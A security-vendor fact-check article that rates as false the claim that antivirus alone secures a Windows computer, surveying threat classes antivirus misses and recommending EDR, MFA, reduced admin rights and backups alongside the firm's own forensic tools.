Fact Check

The Claim

"Running antivirus software is enough to keep my Windows computer secure from cyber attacks."

Verdict: FALSE

Is Antivirus Enough Security? FALSE

By Cyber Forensics Expert. 20+ years of breach response across antivirus-protected endpoints. Published | Updated

Antivirus software was the answer to a 1990s threat model. The 2020s threat model that breaches Sherlock Forensics responds to every week routes around antivirus by design. AV catches a meaningful slice of known malware on disk. It does not catch credential theft phishing pages, supply-chain compromised dependencies, privileged third-party Windows services with missing authorization, living-off-the-land techniques using legitimate Windows binaries, ransomware operators using domain admin credentials plus any of the other categories that account for the majority of modern endpoint compromises. Running antivirus alone in 2026 is necessary minimum hygiene, not adequate protection.

What antivirus actually catches

Antivirus engines do three core things. First, signature scanning matches files on disk against a database of known malicious file hashes and byte patterns. Second, heuristic analysis flags files that exhibit characteristics common to malware (suspicious imports, packing, obfuscation). Third, behavioral monitoring watches running processes for actions that match known malicious behavior patterns (encrypting many files quickly, injecting into other processes, modifying boot configuration).

For commodity malware delivered via traditional vectors (a worm spreading via SMB, a banking trojan dropped from a malicious email attachment, a cryptominer installed by a drive-by exploit kit), modern antivirus catches a high percentage. Independent test labs like AV-TEST and AV-Comparatives publish quarterly detection rates that show major AV products catching 99% or better of known commodity threats. The catch rate is real and the protection is meaningful for that threat class.

The problem is that commodity malware is a shrinking share of the actual breach landscape that drives the ransomware cases Sherlock Forensics handles. The threat classes that dominate modern incidents are largely invisible to antivirus.

What antivirus does not catch

Eight categories of modern endpoint compromise route around antivirus by design.

Credential theft via phishing. A user receives a polished phishing email, clicks the link, lands on a fake login page that looks identical to Microsoft 365 or Google Workspace, types their password. Antivirus never sees a file. The attacker now has working credentials and logs in as the legitimate user. No AV alert because no malware exists.

Supply-chain dependency compromise. A developer's project pulls in a compromised npm or PyPI package. The package executes attacker code during install or runtime. The package is legitimately published to the official package registry. AV does not flag it because the file is not malicious by signature. The runtime behavior looks like the developer running their own code.

Privileged third-party Windows services with missing authorization. A regular user account interacts with a SYSTEM-level service the user already has OS-layer access to reach. The service performs an action the regular user should not be able to invoke. The interaction is the vendor's own software running its own code path. AV sees nothing malicious. This is the class the Sherlock EoP Auditor specifically detects.

Living-off-the-land techniques. An attacker uses legitimate built-in Windows binaries (powershell.exe, certutil.exe, bitsadmin.exe, mshta.exe) to download files, execute payloads or persist. The binaries are signed by Microsoft and present on every Windows install. AV cannot flag them as malicious without flagging every system administrator as malicious. The technique is invisible to signature-based detection.

Ransomware using legitimate credentials. An attacker who has compromised domain admin credentials (often via the foothold paths above) deploys ransomware as the administrator. The ransomware runs with full administrative privilege, signed by the customer's own trusted code-signing certificate in some cases, encrypting files using legitimate cryptographic primitives. AV sees a privileged user running a process. The behavior pattern of encrypting many files quickly is sometimes flagged by behavioral monitoring, but by then the damage is well underway.

Insider threats. An employee with legitimate access exfiltrates data. The user is authorized to read the files. The exfiltration channel is legitimate (email, file sharing service, USB drive). AV has no malicious-file signature to match because no malicious file exists.

Browser-based attacks. An attacker compromises a website the user visits. Malicious JavaScript runs in the browser, exfiltrating session tokens or executing further payloads within the browser sandbox. The browser process is legitimate. The JavaScript is not a file on disk to scan. AV sees nothing.

Cloud account compromises. Many modern attacks never touch the endpoint at all. An attacker compromises a cloud account (M365, Google Workspace, AWS) via stolen credentials or session token theft, then operates entirely in the cloud. The endpoint is healthy. AV has nothing to scan. The damage happens in SaaS infrastructure.

What modern endpoint protection actually requires

Adequate endpoint security in 2026 layers several controls on top of antivirus. Endpoint Detection and Response (EDR) products extend the antivirus model with behavioral telemetry, threat hunting capability and incident response workflow. Major vendors include CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint plus Sophos Intercept X. EDR catches a meaningful slice of what AV misses, particularly living-off-the-land techniques and ransomware staging behavior.

Multi-factor authentication on every account that authenticates anywhere closes the credential theft category for most use cases. The phishing page captures the password but cannot bypass the MFA prompt. Token-based MFA (FIDO2 hardware keys, passkeys) is stronger than SMS MFA which has known weakness via SIM swap forensics.

Privileged access management constrains which accounts can perform which actions. Removing local administrator rights from regular user accounts dramatically limits the blast radius when a credential is compromised. The Sherlock Forensics services practice routinely finds that customers who reduced standing admin privilege had much smaller incident scopes than customers who left it broad.

Patch management and configuration baseline enforcement address the third-party software class the EoP Auditor specifically detects. A privileged third-party service running with a known authorization weakness is invisible to AV but addressable through vendor patching, configuration review and surface enumeration.

Logging and detection visibility lets the team see what is happening on the endpoints. The Sherlock Universal Events Viewer reads Windows event logs for incident response and routine triage. Centralized log aggregation (SIEM) ties endpoint events to network and cloud events for cross-source correlation.

Backup and recovery procedures that survive a ransomware event matter more than any specific preventive control. Immutable backups stored offline or in segmented infrastructure are the actual restore path when prevention fails.

What this means for security planning

Running antivirus is necessary minimum hygiene. It catches commodity malware and removes a category of preventable risk. Continue running antivirus.

Running ONLY antivirus is inadequate for any organization handling sensitive data. The modern threat landscape includes too many categories AV cannot see. For small organizations, the practical upgrade path is: deploy EDR (Microsoft Defender for Endpoint is bundled with most M365 subscriptions and is a real EDR product, not just renamed AV), enforce MFA everywhere, remove standing local admin privilege, run a periodic third-party software audit (the Sherlock EoP Auditor automates this for Windows hosts when it releases). For mid-market and larger organizations, the upgrade path adds centralized log aggregation, periodic penetration testing and an incident response retainer.

For incident response when prevention fails, the Sherlock Forensics services practice handles ransomware response, breach investigation and court-defensible forensic examination. The forensic toolchain includes the Sherlock Disk Imager for acquisition with chain of custody, the Sherlock PST Viewer for mailbox forensics during breach analysis plus the Universal Events Viewer for timeline reconstruction. Talk to our team about incident response or proactive security assessment.

Source citations

  • NIST Cybersecurity Framework 2.0: identifies multiple control categories beyond endpoint protection
  • SANS Reading Room: "Why Antivirus Is Not Enough" series and modern endpoint security research
  • Verizon Data Breach Investigations Report (DBIR): annual statistics on breach causes and attack vectors
  • MITRE ATT&CK Framework: enterprise tactics and techniques documenting what AV cannot detect
  • CISA Known Exploited Vulnerabilities catalog: real-world exploitation of categories AV does not address
  • AV-TEST and AV-Comparatives quarterly test reports: independent measurement of AV detection rates

Sherlock Forensics responds to breaches on antivirus-protected endpoints every week. Talk to our team about endpoint security assessment, incident response or court-defensible forensic examination.